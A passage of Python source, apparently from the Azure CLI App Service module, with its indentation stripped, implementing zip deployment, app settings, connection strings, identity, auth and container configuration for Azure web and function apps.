account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = UA_AGENT
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ce:
# This SDK function throws an error if Status Code is 200
if ce.status_code != 200:
raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity')
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity')
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': UA_AGENT
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
